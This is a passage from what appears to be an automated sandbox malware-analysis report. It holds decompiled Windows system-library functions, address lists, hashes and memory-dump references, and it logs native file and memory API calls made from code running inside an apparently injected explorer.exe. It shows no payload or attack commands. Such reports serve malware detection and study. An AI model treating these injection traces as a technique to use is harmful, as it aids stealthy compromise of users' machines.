									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E009B217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00983F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0095ec56
0x0095ec56
0x0095ec56
0x0095ec5c
0x0095ec64
0x009923e6
0x009923eb
0x009923eb
0x0095ec6a
0x0095ec6c
0x0095ec6f
0x009923f3
0x009923f8
0x009923fa
0x009923fc
0x0095ec75
0x0095ec76
0x0095ec76
0x0095ec7b
0x0095ec7c
0x0095ec7e
0x00992406
0x00992407
0x0099240c
0x0099240d
0x0099240d
0x0099240d
0x00992414
0x00992417
0x0099241e
0x00992435
0x00992438
0x0099243c
0x0099243f
0x00992442
0x00992443
0x00992446
0x00992449
0x00992453
0x00992455
0x0099245b
0x0099245b
0x0095eb99
0x0095eb99
0x0095eb9c
0x0095eb9d
0x0095eb9f
0x0095eba2
0x00992465
0x0099246b
0x0099246d
0x0095eba8
0x0095eba9
0x0095eba9
0x0095ebae
0x0095ebb3
0x0095ebb9
0x0095ebbb
0x00992513
0x00992514
0x00992519
0x0099251b
0x0095ec2a
0x0095ec2d
0x0095ec33
0x0095ec36
0x0095ec3a
0x0095ec3e
0x0095ec40
0x0095ec47
0x0095ec47
0x0095ec40
0x009322c6
0x0095ebc1
0x0095ebc1
0x0095ebc5
0x0095ec9a
0x0095ec9a
0x0095ebd6
0x0095ebd6
0x00000000
0x0095ebbb
0x00992477
0x0099247c
0x00992486
0x0099248b
0x00992496
0x0099249b
0x0099249d
0x009924a0
0x009924a3
0x009924aa
0x009924aa
0x009924a5
0x009924a5
0x009924a5
0x009924ac
0x009924af
0x009924b0
0x009924b3
0x009924b9
0x009924ba
0x009924bb
0x009924c6
0x009924cb
0x009924cd
0x009924d0
0x009924d1
0x009924d4
0x009924d6
0x009924d9
0x009924d9
0x009924dc
0x009924df
0x009924e1
0x009924e7
0x009924e9
0x009924ec
0x009924ef
0x009924f2
0x009924f2
0x009924ef
0x009924e7
0x009924fa
0x009924ff
0x00992501
0x00992503
0x00992506
0x0099250b
0x0095eb8c
0x0095eb93
0x00000000
0x00000000
0x0095eb93
0x00000000
0x0095eb99
0x0095ec85
0x0095ec85
0x0095ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 009924FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0099248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009924BD

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: ea349c92e9f75303e579ae1d9c667db210da5f753af8fafbe2543c20a4ad89c8
Instruction ID: 3a1acd25926168e48c42557dad8a0d0ff4bcd39c46b18bdd64291e0d4388fab8
Opcode Fuzzy Hash: ea349c92e9f75303e579ae1d9c667db210da5f753af8fafbe2543c20a4ad89c8
Instruction Fuzzy Hash: EE41E770600204BBDB24EB69CC85FAA77B9EF84720F208A15F955DB2D1D735EA418B61

Uniqueness

Uniqueness Score: -1.00%

Function 0096FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0096FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0096EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0096EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0096685D(_t167, 4) == 0) {
								if(E0096685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0096685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0096685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00948980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0093DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0096EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0096EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0096fcd1
0x0096fcd6
0x0096fcd9
0x0096fcdc
0x0096fcdf
0x0096fce2
0x0096fce5
0x0096fce8
0x0096fceb
0x0096fced
0x0096fced
0x0096fcf3
0x00000000
0x00000000
0x0096fcfc
0x0096fcfe
0x0096fdc1
0x0099ecbd
0x00000000
0x0099eccc
0x0099eccc
0x0099ecd2
0x00000000
0x00000000
0x0099ecdf
0x0099ece0
0x0099ece4
0x0099eceb
0x0099ecee
0x0099eca8
0x0099eca8
0x0099ecaa
0x0096fd76
0x0096fd79
0x0096fdb4
0x0096fdb5
0x0096fdb6
0x00000000
0x0096fdb6
0x0096fd7e
0x0099ecfc
0x0096fe2f
0x00000000
0x0096fe2f
0x0099ed08
0x0099ed0f
0x0099ed17
0x0099ed1b
0x00000000
0x0099ed1b
0x0096fd88
0x00000000
0x00000000
0x0096fd94
0x0096fd99
0x0096fda1
0x00000000
0x00000000
0x0096fdb0
0x00000000
0x0096fdb0
0x0099ecbd
0x0096fdc7
0x0096fdcb
0x00000000
0x0096fdd7
0x0096fde3
0x0096fe06
0x00981fe7
0x00000000
0x00000000
0x00981fef
0x00981ff0
0x00981ff4
0x00981ff7
0x00981ffa
0x00981ffd
0x00982000
0x00000000
0x00000000
0x0099ecf1
0x00000000
0x0099ecf1
0x00000000
0x0096fe06
0x0096fde8
0x0096fdec
0x0096fdef
0x0096fdf2
0x00000000
0x0096fdf2
0x0096fdcb
0x0096fd04
0x0096fd05
0x0099ec67
0x00000000
0x00000000
0x0099ec6f
0x00000000
0x0099ec6f
0x0096fd13
0x0096fd3c
0x0096fd40
0x0099ec75
0x0099ec7a
0x00000000
0x0099ec8a
0x0099ec8a
0x0099ec90
0x0099ecb2
0x0096fd73
0x0096fd73
0x00000000
0x0096fd73
0x0099ec95
0x00000000
0x00000000
0x0099eca1
0x0099eca4
0x0099eca5
0x00000000
0x0099eca5
0x0099ec7a
0x0096fd4a
0x00000000
0x0096fd6e
0x0096fd6e
0x0096fd71
0x00000000
0x0096fd71
0x0096fd4a
0x0096fd21
0x0097a3a1
0x00000000
0x0097a3a1
0x0096fd36
0x0098200b
0x00982012
0x00000000
0x00000000
0x00982018
0x00000000
0x00982018
0x00000000
0x0096fd36
0x0096fe0f
0x0096fe16
0x0097a3ad
0x00000000
0x00000000
0x0097a3b3
0x0097a3b3
0x0096fe1f
0x0099ed25
0x0099ed86
0x00000000
0x00000000
0x0099ed91
0x0099ed95
0x0099ed95
0x0099ed9a
0x0099edad
0x0099edb3
0x0099edba
0x0099edc4
0x0099edc9
0x00000000
0x0099edcc
0x0099ed2a
0x0099ed55
0x00000000
0x00000000
0x0099ed61
0x0099ed66
0x0099ed6e
0x00000000
0x00000000
0x0099ed7d
0x00000000
0x0099ed7d
0x0099ed30
0x00000000
0x00000000
0x0099ed3c
0x0099ed43
0x0099ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0096FD94

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: f9c7f15c6f711b17c975a8f0e550fe3e56d24bcb9c5de3e31bc1e9cf1592f96a
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 1491F231E0020AEFCF25CF58D8556EEBBB8FF95304F20847AD441A72A2E7355A51CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1900 Parent PID: 2236 explorer.exeCOMMON

Executed Functions

Function 000982AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5

Strings

M;, xrefs: 000982CC, 000982D4

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: M;
API String ID: 2738559852-3261960221
Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction ID: ca783961a335ce8adc81c3e09caae813b6b837b279e20f61f7c2725457d3eefd
Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction Fuzzy Hash: 14110972200204AFCB14DF99CC85EEB77A9EF8C754F158659BA1D97341DA30E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 000982FC, 00098304

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-3560468456
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00098260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction ID: dfd037b287d4f403f0a09a050465891984e3c66b59e639d56761bf02ac1af300
Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction Fuzzy Hash: F0F0F2B6200208ABCB18DF99DC95EEB77A9BF88350F158159BE1897342C630E910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00098390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9

Memory Dump Source

Source File: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 40387beaf1419a180c31e2cff737e2f724b9fe9c60f55009042e5faa2de09132
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 76F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897341CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02A200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A200CF

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 02A207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A207B7

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FAC3

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FAF3

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FADB

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FBC3

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FB73

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02A1FB5B

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
